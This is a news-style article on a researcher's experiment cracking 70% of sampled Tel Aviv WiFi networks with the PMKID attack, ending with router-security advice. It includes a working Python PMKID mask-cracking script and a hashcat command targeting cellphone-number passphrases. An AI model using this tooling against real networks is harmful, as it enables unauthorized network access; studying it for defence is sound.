A security researcher from CyberArk has vividly demonstrated the consequences of lax home network security with a personal, city-wide experiment, aided by a powerful password-cracking rig at CyberArk Labs and a relatively new cracking technique. In an article published on October 26th, 2021 on the CyberArk portal, security researcher Ido Hoorvitch describes the work under the title “How I Cracked 70% of Tel Aviv’s Wifi Networks (from a Sample of 5,000 Gathered WiFi).”
According to the article, the spark for the experiment was the combination of Hoorvitch’s experience, “a relatively new WiFi attack” that he wanted to try out, and the availability of his “new monster cracking rig (8x QUADRO RTX 8000 48GB GPUs).” “WiFi is everywhere because connectivity is more important than ever,” Hoorvitch added, and “with the continued shift to remote work due to the pandemic,” the security of home networks matters as much as that of corporate ones. The results of the experiment more than justified that hunch.
Ido Hoorvitch’s Experiment
To turn his hunch into real-world results, Hoorvitch set out to collect the WiFi signals broadcast around Tel Aviv, Israel by the kind of routers that home users and businesses use all over the world. Walking the city streets with “WiFi sniffing equipment,” he gathered 5,000 network hashes. Once the gathering was complete, he set about cracking what he had found.
The distinguishing factor in Hoorvitch’s approach was that he used a non-traditional method of WiFi cracking, made possible by Hashcat lead developer Jens “atom” Steube’s research into what Steube calls “a new technique to crack WPA PSK (Pre-Shared Key) passwords.”
WiFi Cracking Eureka
Steube’s technique “exposed a new vulnerability targeting RSN IE (Robust Security Network Information Element) to retrieve a PMKID hash.” The classic approach to WPA2-PSK cracking requires capturing a complete EAPOL four-way handshake between a client and the access point, so the attacker has to wait for a client to connect (or force one to reconnect). The PMKID, by contrast, is sent by the access point itself in the RSN IE of the first EAPOL frame after an association request, so no connected client is needed; the attack “only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process.” Because the PMKID is derived from the PMK, which in WPA2-PSK is derived only from the passphrase and the network name, the captured value can be brute-forced offline.
Hoorvitch’s experiment was a great success: “we cracked more than 3,500 WiFi networks in and around Tel Aviv – 70% of our sample.” He explained his first step: “We chose to start with what’s called a ‘mask attack,’ due to the terrible habit many people living in Israel have of using their cellphone numbers as WiFi passwords.” A mask attack is a brute-force attack constrained by a pattern: instead of trying every string of a given length, the cracker tries only candidates that match a template (for example a fixed prefix followed by a fixed number of digits), which shrinks the keyspace by many orders of magnitude.
The cracking process requires three tools, each in version 4.2.0 or higher: hcxdumptool, hcxtools (which provides the hcxpcaptool converter) and hashcat. hcxdumptool captures the WLAN traffic, hcxpcaptool converts the capture into a hash file, and hashcat cracks the hashes. All three are publicly available: Steube (“atom”) linked them in his post on the Hashcat portal, and the hcx tools are maintained in user ZerBea’s GitHub repository. In current releases hcxpcaptool has been superseded by hcxpcapngtool, and hashcat’s dedicated PMKID mode 16800 by the combined WPA mode 22000, but the workflow is the same.
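To make the PMKID attack and the mask attack concrete, here is an added Python example; it is not code from Hoorvitch’s article or from the hcx/hashcat projects. It reimplements, at toy speed, what hashcat does in mode 22000: derive the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1, compute the PMKID from the PMK and the two MAC addresses, and compare it with the captured value. The hash line, network name, MAC addresses and passphrase are constructed for the example; the mask syntax follows hashcat’s ?d/?l/?u/?s placeholders.

```python
import hashlib
import hmac
import itertools
from typing import Iterator, List, Optional

# Character classes of hashcat's built-in mask placeholders (subset).
MASK_CHARSETS = {
    "d": "0123456789",
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step, and the reason GPUs matter."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA).
    The AP places this in the RSN IE of the first EAPOL frame it sends."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def make_hc22000(passphrase: str, essid: str, mac_ap_hex: str, mac_sta_hex: str) -> str:
    """Build a hashcat 22000-format PMKID line (WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***)
    from a known passphrase. Only used to construct sample input for this example;
    in a real attack the line comes out of hcxpcapngtool (or hcxpcaptool -z)."""
    pmk = derive_pmk(passphrase, essid)
    pmkid = compute_pmkid(pmk, bytes.fromhex(mac_ap_hex), bytes.fromhex(mac_sta_hex))
    return f"WPA*01*{pmkid.hex()}*{mac_ap_hex}*{mac_sta_hex}*{essid.encode().hex()}***"


def parse_hc22000(line: str) -> dict:
    """Parse the PMKID variant (type 01) of the hashcat 22000 line format."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("expected a WPA*01 (PMKID) line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "mac_ap": bytes.fromhex(fields[3]),
        "mac_sta": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]).decode(),
    }


def parse_mask(mask: str) -> List[str]:
    """Turn a hashcat-style mask into one alphabet per output position:
    '?d' etc. expand to a charset, '??' is a literal '?', anything else is literal."""
    alphabets: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            if nxt == "?":
                alphabets.append("?")
            elif nxt in MASK_CHARSETS:
                alphabets.append(MASK_CHARSETS[nxt])
            else:
                raise ValueError(f"unknown placeholder ?{nxt}")
            i += 2
        else:
            alphabets.append(mask[i])
            i += 1
    return alphabets


def mask_keyspace(mask: str) -> int:
    """Number of candidates the mask generates (product of the alphabet sizes)."""
    n = 1
    for alphabet in parse_mask(mask):
        n *= len(alphabet)
    return n


def mask_candidates(mask: str) -> Iterator[str]:
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def crack_pmkid(line: str, mask: str, limit: Optional[int] = None) -> Optional[str]:
    """Offline attack: PMK -> PMKID for every mask candidate, compared against the
    captured PMKID. Returns the passphrase, or None if the mask does not cover it."""
    target = parse_hc22000(line)
    for n, candidate in enumerate(mask_candidates(mask)):
        if limit is not None and n >= limit:
            return None
        pmk = derive_pmk(candidate, target["essid"])
        if hmac.compare_digest(compute_pmkid(pmk, target["mac_ap"], target["mac_sta"]), target["pmkid"]):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: a fictional network whose passphrase is an Israeli-style
    # cellphone number (05 + 8 digits). The MAC addresses are made up.
    sample = make_hc22000("0521234567", "HomeNet-5G", "aabbccddeeff", "001122334455")
    print("cellphone mask 05?d?d?d?d?d?d?d?d covers", mask_keyspace("05?d?d?d?d?d?d?d?d"), "candidates")
    print("narrowed mask recovered:", crack_pmkid(sample, "05212345?d?d"))
```

The full cellphone mask is 10^8 candidates, each costing 4096 HMAC-SHA1 rounds, which is hopeless in Python but a few minutes on the GPU rig described above; in hashcat the same run is `hashcat -m 22000 -a 3 capture.22000 05?d?d?d?d?d?d?d?d`. The example narrows the mask so that it finishes in about a second, and the PBKDF2 step can be checked against the 802.11i test vector (passphrase “password”, SSID “IEEE”).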
Steube added, “This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard.” He also stated that the technique will be much harder to apply to routers running WPA3, whose SAE (Simultaneous Authentication of Equals) handshake does not expose a passphrase-derived value that can be brute-forced offline from a single captured frame.
Which Routers Are Vulnerable?
According to Steube, “At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).”
Important Cybersecurity Takeaways
Hoorvitch concludes that the experiment is all the proof needed to show that “greater attention must be paid to protecting oneself.” Once an attacker is on a WiFi network, the dangers include man-in-the-middle attacks, lateral movement between devices on the network, hopping from the compromised network to others reachable from it, and further attack vectors.
Hoorvitch went on to list security recommendations that protect users against this attack:
- Using a password of at least 10 characters that includes symbols and digits (and is not a phone number or another predictable pattern that a mask attack can enumerate)
- Changing the default username and password of the router
- Updating the router firmware to the latest release
- Disabling WPS
- Using WPA3 where available, and otherwise WPA2; disabling weak protocols such as WEP and WPA